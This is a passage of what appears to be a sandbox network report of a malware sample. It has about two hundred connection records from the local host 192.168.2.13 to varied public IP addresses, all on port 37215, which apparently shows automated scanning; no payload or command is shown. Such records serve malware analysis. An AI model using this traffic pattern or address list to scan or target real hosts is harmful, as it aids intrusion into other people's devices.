                                                  15221192.168.2.1341926157.64.238.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15222192.168.2.134167441.51.62.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15223192.168.2.1338410157.127.178.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15224192.168.2.1342148197.190.195.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15225192.168.2.1333078197.233.71.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15226192.168.2.135150883.157.1.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15227192.168.2.135378835.248.242.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15228192.168.2.1346492157.138.216.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15229192.168.2.1341080169.55.55.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15230192.168.2.1344010197.242.2.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15231192.168.2.1347130173.95.188.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15232192.168.2.1337904197.13.253.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15233192.168.2.135680093.154.26.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15234192.168.2.1360540166.145.119.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15235192.168.2.135538089.176.170.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15236192.168.2.1339626197.95.159.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15237192.168.2.133710841.89.18.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15238192.168.2.133928241.97.7.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15239192.168.2.1360658197.195.185.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15240192.168.2.1338040157.197.229.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15241192.168.2.133441441.144.75.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15242192.168.2.134902441.53.26.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15243192.168.2.134229041.185.245.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15244192.168.2.134980441.230.207.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15245192.168.2.135461841.101.137.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15246192.168.2.1338674197.195.250.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15247192.168.2.1338170157.214.172.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15248192.168.2.1340050197.64.2.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15249192.168.2.1343284188.145.121.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15250192.168.2.1351650157.79.184.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15251192.168.2.1352098120.178.45.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15252192.168.2.133736047.78.55.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15253192.168.2.1356774197.17.3.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15254192.168.2.134708641.95.102.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15255192.168.2.133674849.9.121.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15256192.168.2.1353228157.235.183.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15257192.168.2.1334352220.72.20.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15258192.168.2.1358962123.11.39.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15259192.168.2.1358110197.19.94.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15260192.168.2.1336030197.52.194.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15261192.168.2.1357746197.212.160.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15262192.168.2.1339464197.81.117.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15263192.168.2.1337316157.124.197.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15264192.168.2.135598041.172.222.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15265192.168.2.1339314123.179.148.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15266192.168.2.1339476157.96.104.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15267192.168.2.1342668157.178.74.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15268192.168.2.1342728197.232.228.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15269192.168.2.1338044197.173.100.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15270192.168.2.1341226197.245.149.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15271192.168.2.1352550197.146.221.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15272192.168.2.134710066.98.255.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15273192.168.2.1342298197.209.58.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15274192.168.2.1353764157.96.12.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15275192.168.2.1356124157.236.196.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15276192.168.2.1356174197.235.8.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15277192.168.2.1333132157.49.59.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15278192.168.2.1341408197.106.103.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15279192.168.2.1350558156.26.88.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15280192.168.2.134418041.26.172.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15281192.168.2.1345502157.113.40.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15282192.168.2.1349652197.227.37.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15283192.168.2.135809241.94.226.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15284192.168.2.134453641.153.235.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15285192.168.2.1342402157.16.82.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15286192.168.2.1357816217.10.103.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15287192.168.2.1340264197.156.171.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15288192.168.2.1348046197.139.217.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15289192.168.2.1333188157.116.58.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15290192.168.2.1342346140.72.130.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15291192.168.2.135252641.142.249.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15292192.168.2.1359392197.66.235.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15293192.168.2.134755641.222.128.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15294192.168.2.13604784.151.173.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15295192.168.2.1355064197.184.122.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15296192.168.2.1352172192.208.167.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15297192.168.2.135059641.106.56.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15298192.168.2.1358362197.103.232.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15299192.168.2.1343330157.72.214.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15300192.168.2.1338580157.210.243.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15301192.168.2.1360754197.122.201.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15302192.168.2.1351128157.41.232.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15303192.168.2.1351814197.129.239.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15304192.168.2.1350698157.247.2.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15305192.168.2.1351988157.48.52.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15306192.168.2.133864041.249.48.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15307192.168.2.1345896157.110.78.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15308192.168.2.1357562197.30.209.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15309192.168.2.135909681.39.29.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15310192.168.2.133884041.184.243.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15311192.168.2.134624098.190.153.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15312192.168.2.1333802197.201.179.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15313192.168.2.1343628157.85.8.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15314192.168.2.1355636157.156.226.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15315192.168.2.135593041.159.70.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15316192.168.2.134895441.41.6.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15317192.168.2.135304241.95.115.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15318192.168.2.134650041.251.34.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15319192.168.2.133733441.232.72.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15320192.168.2.1340112157.236.75.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15321192.168.2.1342302157.48.233.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15322192.168.2.135934441.19.130.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15323192.168.2.1352976157.227.158.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15324192.168.2.1342898218.161.16.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15325192.168.2.133390041.62.233.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15326192.168.2.1350138157.22.166.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15327192.168.2.1340834157.94.170.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15328192.168.2.135720441.183.26.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15329192.168.2.134555641.242.199.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15330192.168.2.1353692217.191.82.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15331192.168.2.1338816197.126.135.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15332192.168.2.134671041.52.7.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15333192.168.2.1356164197.199.93.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15334192.168.2.1360540187.91.117.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15335192.168.2.1341158157.11.105.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15336192.168.2.1334064157.151.77.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15337192.168.2.1351152181.168.115.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15338192.168.2.1338580197.165.105.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15339192.168.2.1334224180.136.245.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15340192.168.2.1355990157.72.14.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15341192.168.2.1359678197.101.89.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15342192.168.2.1344624197.7.78.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15343192.168.2.1351352200.161.29.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15344192.168.2.1352516157.21.91.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15345192.168.2.1345450107.175.85.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15346192.168.2.1355804157.82.32.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15347192.168.2.1342998192.81.16.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15348192.168.2.1351310157.15.227.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15349192.168.2.1349156157.186.166.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15350192.168.2.1360378157.156.210.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15351192.168.2.1355280157.186.89.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15352192.168.2.1353864197.185.15.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15353192.168.2.134349841.148.128.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15354192.168.2.1339504197.155.143.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15355192.168.2.1345206197.96.68.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15356192.168.2.1340880157.231.131.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15357192.168.2.1355464157.175.164.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15358192.168.2.1333810157.107.210.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15359192.168.2.1337646157.152.16.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15360192.168.2.1342940197.146.75.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15361192.168.2.1333180145.191.205.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15362192.168.2.1342564197.99.118.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15363192.168.2.1338328197.108.117.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15364192.168.2.134570241.200.246.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15365192.168.2.1354454197.145.140.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15366192.168.2.1337702197.113.99.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15367192.168.2.1355312157.22.104.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15368192.168.2.1348026198.41.163.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15369192.168.2.1358316159.83.212.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15370192.168.2.1360666197.191.233.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15371192.168.2.1350148197.157.209.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15372192.168.2.1358490125.111.175.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15373192.168.2.1349552197.100.149.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15374192.168.2.1338722157.183.50.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15375192.168.2.134296041.4.81.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15376192.168.2.1342090157.51.184.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15377192.168.2.1356536197.82.22.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15378192.168.2.134734641.40.211.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15379192.168.2.1345290197.102.150.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15380192.168.2.134541641.188.105.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15381192.168.2.1334968157.131.203.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15382192.168.2.134639841.209.232.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15383192.168.2.134985041.60.5.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15384192.168.2.1345616157.59.36.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15385192.168.2.134235041.235.97.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15386192.168.2.1354106157.103.205.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15387192.168.2.135824041.241.23.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15388192.168.2.1348762157.176.161.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15389192.168.2.133957041.120.104.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15390192.168.2.1347298157.54.114.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15391192.168.2.1360952157.81.78.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15392192.168.2.1349120217.220.153.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15393192.168.2.1348208157.92.244.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15394192.168.2.136046241.221.226.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15395192.168.2.1360356197.122.190.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15396192.168.2.134944884.78.104.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15397192.168.2.1335922157.55.99.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15398192.168.2.135090241.196.170.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15399192.168.2.1355030197.43.100.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15400192.168.2.1336074197.250.173.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15401192.168.2.134542441.208.255.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15402192.168.2.1343948147.199.15.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15403192.168.2.1342644157.103.119.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15404192.168.2.1351160157.43.115.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15405192.168.2.135380441.75.132.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15406192.168.2.133517641.203.32.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15407192.168.2.1333716197.216.11.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15408192.168.2.1349362100.12.220.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15409192.168.2.1356008197.109.131.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15410192.168.2.136070041.15.225.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15411192.168.2.1347716197.2.52.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15412192.168.2.134450241.2.124.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15413192.168.2.134396441.227.1.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15414192.168.2.1341900157.62.31.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15415192.168.2.1335024111.150.83.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15416192.168.2.1332840114.35.197.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15417192.168.2.13386548.233.145.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15418192.168.2.1340258165.78.115.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15419192.168.2.1333344197.181.48.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15420192.168.2.1347364197.181.88.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15421192.168.2.1334326157.60.73.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15422192.168.2.1354346171.195.86.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15423192.168.2.134466627.45.161.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15424192.168.2.1339372197.87.165.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15425192.168.2.1344374197.107.157.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15426192.168.2.1360424157.122.44.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15427192.168.2.1356516157.193.180.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15428192.168.2.1344564197.178.80.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15429192.168.2.135447041.60.18.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15430192.168.2.135180891.234.145.17837215
